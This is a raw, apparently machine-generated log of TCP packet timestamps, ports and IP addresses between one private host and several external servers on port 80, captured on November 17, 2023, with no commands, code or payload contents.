                                                                                                                                                                                                Nov 17, 2023 19:29:51.511831999 CET5016080192.168.11.20216.40.34.41
                                                                                                                                                                                                Nov 17, 2023 19:29:51.569072962 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.569277048 CET5016080192.168.11.20216.40.34.41
                                                                                                                                                                                                Nov 17, 2023 19:29:51.569431067 CET5016080192.168.11.20216.40.34.41
                                                                                                                                                                                                Nov 17, 2023 19:29:51.569560051 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.569611073 CET5016080192.168.11.20216.40.34.41
                                                                                                                                                                                                Nov 17, 2023 19:29:51.569711924 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.569772005 CET5016080192.168.11.20216.40.34.41
                                                                                                                                                                                                Nov 17, 2023 19:29:51.569947004 CET5016080192.168.11.20216.40.34.41
                                                                                                                                                                                                Nov 17, 2023 19:29:51.570039988 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.570118904 CET5016080192.168.11.20216.40.34.41
                                                                                                                                                                                                Nov 17, 2023 19:29:51.570264101 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.570295095 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.570586920 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.570838928 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.571122885 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.571154118 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.626816988 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.684146881 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.684237003 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.684288025 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.685111046 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.723129988 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.723241091 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.723306894 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.723407984 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.723475933 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.723536015 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.723551035 CET5016080192.168.11.20216.40.34.41
                                                                                                                                                                                                Nov 17, 2023 19:29:51.723745108 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.723758936 CET5016080192.168.11.20216.40.34.41
                                                                                                                                                                                                Nov 17, 2023 19:29:51.723836899 CET5016080192.168.11.20216.40.34.41
                                                                                                                                                                                                Nov 17, 2023 19:29:51.726610899 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.726707935 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.726886034 CET5016080192.168.11.20216.40.34.41
                                                                                                                                                                                                Nov 17, 2023 19:29:51.770857096 CET5016080192.168.11.20216.40.34.41
                                                                                                                                                                                                Nov 17, 2023 19:29:51.837210894 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.837316990 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.837388039 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.837485075 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.837553978 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.837618113 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.837793112 CET5016080192.168.11.20216.40.34.41
                                                                                                                                                                                                Nov 17, 2023 19:29:51.837806940 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.837882042 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.838093042 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.838143110 CET5016080192.168.11.20216.40.34.41
                                                                                                                                                                                                Nov 17, 2023 19:29:51.838162899 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.838485003 CET5016080192.168.11.20216.40.34.41
                                                                                                                                                                                                Nov 17, 2023 19:29:51.840205908 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.840310097 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.840378046 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.840543032 CET5016080192.168.11.20216.40.34.41
                                                                                                                                                                                                Nov 17, 2023 19:29:51.840564966 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.840816975 CET5016080192.168.11.20216.40.34.41
                                                                                                                                                                                                Nov 17, 2023 19:29:51.884835958 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.884927034 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.885160923 CET5016080192.168.11.20216.40.34.41
                                                                                                                                                                                                Nov 17, 2023 19:29:51.952685118 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.952792883 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.952863932 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.952961922 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.953031063 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.953032017 CET5016080192.168.11.20216.40.34.41
                                                                                                                                                                                                Nov 17, 2023 19:29:51.953098059 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.953198910 CET5016080192.168.11.20216.40.34.41
                                                                                                                                                                                                Nov 17, 2023 19:29:51.953293085 CET5016080192.168.11.20216.40.34.41
                                                                                                                                                                                                Nov 17, 2023 19:29:51.953313112 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.953385115 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.953557968 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.953624964 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.953625917 CET5016080192.168.11.20216.40.34.41
                                                                                                                                                                                                Nov 17, 2023 19:29:51.953816891 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.953859091 CET5016080192.168.11.20216.40.34.41
                                                                                                                                                                                                Nov 17, 2023 19:29:51.953886986 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.953957081 CET8050160216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:51.954093933 CET5016080192.168.11.20216.40.34.41
                                                                                                                                                                                                Nov 17, 2023 19:29:51.954094887 CET5016080192.168.11.20216.40.34.41
                                                                                                                                                                                                Nov 17, 2023 19:29:52.676927090 CET5016080192.168.11.20216.40.34.41
                                                                                                                                                                                                Nov 17, 2023 19:29:53.692589045 CET5016180192.168.11.20216.40.34.41
                                                                                                                                                                                                Nov 17, 2023 19:29:53.807137012 CET8050161216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:53.807338953 CET5016180192.168.11.20216.40.34.41
                                                                                                                                                                                                Nov 17, 2023 19:29:53.807573080 CET5016180192.168.11.20216.40.34.41
                                                                                                                                                                                                Nov 17, 2023 19:29:53.942323923 CET8050161216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:53.942445993 CET8050161216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:53.942508936 CET8050161216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:53.942671061 CET5016180192.168.11.20216.40.34.41
                                                                                                                                                                                                Nov 17, 2023 19:29:53.942732096 CET8050161216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:53.942802906 CET8050161216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:53.942847967 CET8050161216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:53.942897081 CET8050161216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:53.942994118 CET5016180192.168.11.20216.40.34.41
                                                                                                                                                                                                Nov 17, 2023 19:29:53.943067074 CET5016180192.168.11.20216.40.34.41
                                                                                                                                                                                                Nov 17, 2023 19:29:53.943121910 CET5016180192.168.11.20216.40.34.41
                                                                                                                                                                                                Nov 17, 2023 19:29:53.943178892 CET5016180192.168.11.20216.40.34.41
                                                                                                                                                                                                Nov 17, 2023 19:29:54.059050083 CET8050161216.40.34.41192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:59.111915112 CET5016280192.168.11.20160.202.170.21
                                                                                                                                                                                                Nov 17, 2023 19:29:59.432713985 CET8050162160.202.170.21192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:29:59.433135986 CET5016280192.168.11.20160.202.170.21
                                                                                                                                                                                                Nov 17, 2023 19:29:59.433222055 CET5016280192.168.11.20160.202.170.21
                                                                                                                                                                                                Nov 17, 2023 19:30:00.128356934 CET5016280192.168.11.20160.202.170.21
                                                                                                                                                                                                Nov 17, 2023 19:30:00.449803114 CET8050162160.202.170.21192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:00.449875116 CET8050162160.202.170.21192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:00.450156927 CET5016280192.168.11.20160.202.170.21
                                                                                                                                                                                                Nov 17, 2023 19:30:00.749825001 CET8050162160.202.170.21192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:00.750047922 CET5016280192.168.11.20160.202.170.21
                                                                                                                                                                                                Nov 17, 2023 19:30:00.940665007 CET5016280192.168.11.20160.202.170.21
                                                                                                                                                                                                Nov 17, 2023 19:30:01.956386089 CET5016380192.168.11.20160.202.170.21
                                                                                                                                                                                                Nov 17, 2023 19:30:02.279383898 CET8050163160.202.170.21192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:02.279722929 CET5016380192.168.11.20160.202.170.21
                                                                                                                                                                                                Nov 17, 2023 19:30:02.279953957 CET5016380192.168.11.20160.202.170.21
                                                                                                                                                                                                Nov 17, 2023 19:30:02.604366064 CET8050163160.202.170.21192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:02.604444027 CET8050163160.202.170.21192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:02.604650974 CET5016380192.168.11.20160.202.170.21
                                                                                                                                                                                                Nov 17, 2023 19:30:03.783932924 CET5016380192.168.11.20160.202.170.21
                                                                                                                                                                                                Nov 17, 2023 19:30:04.799573898 CET5016480192.168.11.20160.202.170.21
                                                                                                                                                                                                Nov 17, 2023 19:30:05.122649908 CET8050164160.202.170.21192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:05.122946978 CET5016480192.168.11.20160.202.170.21
                                                                                                                                                                                                Nov 17, 2023 19:30:05.124326944 CET5016480192.168.11.20160.202.170.21
                                                                                                                                                                                                Nov 17, 2023 19:30:05.124401093 CET5016480192.168.11.20160.202.170.21
                                                                                                                                                                                                Nov 17, 2023 19:30:05.445492983 CET8050164160.202.170.21192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:05.445691109 CET8050164160.202.170.21192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:05.445769072 CET5016480192.168.11.20160.202.170.21
                                                                                                                                                                                                Nov 17, 2023 19:30:05.445954084 CET5016480192.168.11.20160.202.170.21
                                                                                                                                                                                                Nov 17, 2023 19:30:05.446083069 CET8050164160.202.170.21192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:05.446151018 CET8050164160.202.170.21192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:05.446450949 CET5016480192.168.11.20160.202.170.21
                                                                                                                                                                                                Nov 17, 2023 19:30:05.446619987 CET5016480192.168.11.20160.202.170.21
                                                                                                                                                                                                Nov 17, 2023 19:30:05.768364906 CET8050164160.202.170.21192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:05.768614054 CET5016480192.168.11.20160.202.170.21
                                                                                                                                                                                                Nov 17, 2023 19:30:05.768667936 CET8050164160.202.170.21192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:05.768784046 CET5016480192.168.11.20160.202.170.21
                                                                                                                                                                                                Nov 17, 2023 19:30:05.768867016 CET5016480192.168.11.20160.202.170.21
                                                                                                                                                                                                Nov 17, 2023 19:30:05.769179106 CET8050164160.202.170.21192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:05.769407034 CET8050164160.202.170.21192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:05.769489050 CET5016480192.168.11.20160.202.170.21
                                                                                                                                                                                                Nov 17, 2023 19:30:05.769656897 CET5016480192.168.11.20160.202.170.21
                                                                                                                                                                                                Nov 17, 2023 19:30:05.769900084 CET8050164160.202.170.21192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:05.770422935 CET8050164160.202.170.21192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:06.090497017 CET8050164160.202.170.21192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:06.090610981 CET8050164160.202.170.21192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:06.090667009 CET8050164160.202.170.21192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:06.090794086 CET8050164160.202.170.21192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:06.091422081 CET8050164160.202.170.21192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:06.091547966 CET8050164160.202.170.21192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:06.091890097 CET8050164160.202.170.21192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:06.091962099 CET8050164160.202.170.21192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:06.092041969 CET8050164160.202.170.21192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:06.092281103 CET5016480192.168.11.20160.202.170.21
                                                                                                                                                                                                Nov 17, 2023 19:30:06.627095938 CET5016480192.168.11.20160.202.170.21
                                                                                                                                                                                                Nov 17, 2023 19:30:07.642631054 CET5016580192.168.11.20160.202.170.21
                                                                                                                                                                                                Nov 17, 2023 19:30:07.963628054 CET8050165160.202.170.21192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:07.963865042 CET5016580192.168.11.20160.202.170.21
                                                                                                                                                                                                Nov 17, 2023 19:30:07.964027882 CET5016580192.168.11.20160.202.170.21
                                                                                                                                                                                                Nov 17, 2023 19:30:08.285720110 CET8050165160.202.170.21192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:08.285797119 CET8050165160.202.170.21192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:08.286181927 CET5016580192.168.11.20160.202.170.21
                                                                                                                                                                                                Nov 17, 2023 19:30:08.286256075 CET5016580192.168.11.20160.202.170.21
                                                                                                                                                                                                Nov 17, 2023 19:30:08.607263088 CET8050165160.202.170.21192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:13.494311094 CET5016680192.168.11.2023.227.38.74
                                                                                                                                                                                                Nov 17, 2023 19:30:13.593842030 CET805016623.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:13.594213009 CET5016680192.168.11.2023.227.38.74
                                                                                                                                                                                                Nov 17, 2023 19:30:13.594327927 CET5016680192.168.11.2023.227.38.74
                                                                                                                                                                                                Nov 17, 2023 19:30:13.694493055 CET805016623.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:13.846436977 CET805016623.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:13.846538067 CET805016623.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:13.846610069 CET805016623.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:13.846662045 CET805016623.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:13.846714973 CET805016623.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:13.846765041 CET805016623.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:13.846863031 CET5016680192.168.11.2023.227.38.74
                                                                                                                                                                                                Nov 17, 2023 19:30:13.847115040 CET5016680192.168.11.2023.227.38.74
                                                                                                                                                                                                Nov 17, 2023 19:30:15.109414101 CET5016680192.168.11.2023.227.38.74
                                                                                                                                                                                                Nov 17, 2023 19:30:16.125124931 CET5016780192.168.11.2023.227.38.74
                                                                                                                                                                                                Nov 17, 2023 19:30:16.224802971 CET805016723.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:16.225055933 CET5016780192.168.11.2023.227.38.74
                                                                                                                                                                                                Nov 17, 2023 19:30:16.225250959 CET5016780192.168.11.2023.227.38.74
                                                                                                                                                                                                Nov 17, 2023 19:30:16.324820995 CET805016723.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:16.632951975 CET805016723.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:16.633049011 CET805016723.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:16.633117914 CET805016723.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:16.633169889 CET805016723.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:16.633217096 CET805016723.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:16.633270025 CET805016723.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:16.633358002 CET5016780192.168.11.2023.227.38.74
                                                                                                                                                                                                Nov 17, 2023 19:30:16.633683920 CET5016780192.168.11.2023.227.38.74
                                                                                                                                                                                                Nov 17, 2023 19:30:17.733808041 CET5016780192.168.11.2023.227.38.74
                                                                                                                                                                                                Nov 17, 2023 19:30:18.749550104 CET5016880192.168.11.2023.227.38.74
                                                                                                                                                                                                Nov 17, 2023 19:30:18.850087881 CET805016823.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:18.850269079 CET5016880192.168.11.2023.227.38.74
                                                                                                                                                                                                Nov 17, 2023 19:30:18.851538897 CET5016880192.168.11.2023.227.38.74
                                                                                                                                                                                                Nov 17, 2023 19:30:18.851640940 CET5016880192.168.11.2023.227.38.74
                                                                                                                                                                                                Nov 17, 2023 19:30:18.950026035 CET805016823.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:18.950208902 CET5016880192.168.11.2023.227.38.74
                                                                                                                                                                                                Nov 17, 2023 19:30:18.950251102 CET805016823.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:18.950289011 CET805016823.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:18.950382948 CET5016880192.168.11.2023.227.38.74
                                                                                                                                                                                                Nov 17, 2023 19:30:18.950504065 CET805016823.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:18.950532913 CET805016823.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:18.950557947 CET805016823.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:18.950602055 CET5016880192.168.11.2023.227.38.74
                                                                                                                                                                                                Nov 17, 2023 19:30:18.950763941 CET5016880192.168.11.2023.227.38.74
                                                                                                                                                                                                Nov 17, 2023 19:30:18.950818062 CET805016823.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:18.950927973 CET5016880192.168.11.2023.227.38.74
                                                                                                                                                                                                Nov 17, 2023 19:30:18.951109886 CET5016880192.168.11.2023.227.38.74
                                                                                                                                                                                                Nov 17, 2023 19:30:18.951426029 CET805016823.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:18.951687098 CET5016880192.168.11.2023.227.38.74
                                                                                                                                                                                                Nov 17, 2023 19:30:18.951715946 CET805016823.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:18.951843977 CET5016880192.168.11.2023.227.38.74
                                                                                                                                                                                                Nov 17, 2023 19:30:18.951976061 CET5016880192.168.11.2023.227.38.74
                                                                                                                                                                                                Nov 17, 2023 19:30:19.049041986 CET805016823.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:19.049104929 CET805016823.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:19.049146891 CET805016823.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:19.049185991 CET805016823.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:19.049309015 CET5016880192.168.11.2023.227.38.74
                                                                                                                                                                                                Nov 17, 2023 19:30:19.049534082 CET805016823.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:19.049591064 CET805016823.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:19.049633980 CET805016823.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:19.049644947 CET5016880192.168.11.2023.227.38.74
                                                                                                                                                                                                Nov 17, 2023 19:30:19.049799919 CET805016823.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:19.049815893 CET5016880192.168.11.2023.227.38.74
                                                                                                                                                                                                Nov 17, 2023 19:30:19.050004005 CET5016880192.168.11.2023.227.38.74
                                                                                                                                                                                                Nov 17, 2023 19:30:19.050141096 CET805016823.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:19.050151110 CET5016880192.168.11.2023.227.38.74
                                                                                                                                                                                                Nov 17, 2023 19:30:19.050192118 CET805016823.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:19.050383091 CET805016823.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:19.050693035 CET805016823.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:19.051498890 CET805016823.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:19.093883991 CET805016823.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:19.148628950 CET805016823.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:19.148704052 CET805016823.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:19.148752928 CET805016823.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:19.150373936 CET805016823.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:19.150463104 CET805016823.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:19.150512934 CET805016823.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:19.322103977 CET805016823.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:19.322199106 CET805016823.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:19.322309971 CET805016823.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:19.322365999 CET805016823.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:19.322415113 CET805016823.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:19.322467089 CET805016823.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:19.322699070 CET5016880192.168.11.2023.227.38.74
                                                                                                                                                                                                Nov 17, 2023 19:30:19.421991110 CET805016823.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:21.373893023 CET5016980192.168.11.2023.227.38.74
                                                                                                                                                                                                Nov 17, 2023 19:30:21.473140955 CET805016923.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:21.473484993 CET5016980192.168.11.2023.227.38.74
                                                                                                                                                                                                Nov 17, 2023 19:30:21.473592043 CET5016980192.168.11.2023.227.38.74
                                                                                                                                                                                                Nov 17, 2023 19:30:21.571991920 CET805016923.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:21.623433113 CET805016923.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:21.623517990 CET805016923.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:21.623610020 CET805016923.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:21.623713017 CET805016923.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:21.623811960 CET5016980192.168.11.2023.227.38.74
                                                                                                                                                                                                Nov 17, 2023 19:30:21.623883963 CET5016980192.168.11.2023.227.38.74
                                                                                                                                                                                                Nov 17, 2023 19:30:21.625339985 CET5016980192.168.11.2023.227.38.74
                                                                                                                                                                                                Nov 17, 2023 19:30:21.723525047 CET805016923.227.38.74192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:26.861098051 CET5017080192.168.11.2045.33.23.183
                                                                                                                                                                                                Nov 17, 2023 19:30:27.001319885 CET805017045.33.23.183192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:27.001553059 CET5017080192.168.11.2045.33.23.183
                                                                                                                                                                                                Nov 17, 2023 19:30:27.001693964 CET5017080192.168.11.2045.33.23.183
                                                                                                                                                                                                Nov 17, 2023 19:30:27.145768881 CET805017045.33.23.183192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:27.145854950 CET805017045.33.23.183192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:27.146203995 CET5017080192.168.11.2045.33.23.183
                                                                                                                                                                                                Nov 17, 2023 19:30:28.512805939 CET5017080192.168.11.2045.33.23.183
                                                                                                                                                                                                Nov 17, 2023 19:30:29.528475046 CET5017180192.168.11.2045.33.23.183
                                                                                                                                                                                                Nov 17, 2023 19:30:29.670433044 CET805017145.33.23.183192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:29.670691967 CET5017180192.168.11.2045.33.23.183
                                                                                                                                                                                                Nov 17, 2023 19:30:29.670878887 CET5017180192.168.11.2045.33.23.183
                                                                                                                                                                                                Nov 17, 2023 19:30:29.814033985 CET805017145.33.23.183192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:29.814100981 CET805017145.33.23.183192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:29.814275026 CET5017180192.168.11.2045.33.23.183
                                                                                                                                                                                                Nov 17, 2023 19:30:31.184175968 CET5017180192.168.11.2045.33.23.183
                                                                                                                                                                                                Nov 17, 2023 19:30:32.199717999 CET5017280192.168.11.2045.33.23.183
                                                                                                                                                                                                Nov 17, 2023 19:30:32.339971066 CET805017245.33.23.183192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:32.340512991 CET5017280192.168.11.2045.33.23.183
                                                                                                                                                                                                Nov 17, 2023 19:30:32.341881037 CET5017280192.168.11.2045.33.23.183
                                                                                                                                                                                                Nov 17, 2023 19:30:32.341968060 CET5017280192.168.11.2045.33.23.183
                                                                                                                                                                                                Nov 17, 2023 19:30:32.482439995 CET805017245.33.23.183192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:32.482534885 CET805017245.33.23.183192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:32.482578993 CET805017245.33.23.183192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:32.482618093 CET805017245.33.23.183192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:32.482650995 CET5017280192.168.11.2045.33.23.183
                                                                                                                                                                                                Nov 17, 2023 19:30:32.482686996 CET805017245.33.23.183192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:32.482783079 CET5017280192.168.11.2045.33.23.183
                                                                                                                                                                                                Nov 17, 2023 19:30:32.482794046 CET805017245.33.23.183192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:32.482944965 CET5017280192.168.11.2045.33.23.183
                                                                                                                                                                                                Nov 17, 2023 19:30:32.483037949 CET805017245.33.23.183192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:32.483093977 CET805017245.33.23.183192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:30:32.483124018 CET5017280192.168.11.2045.33.23.183
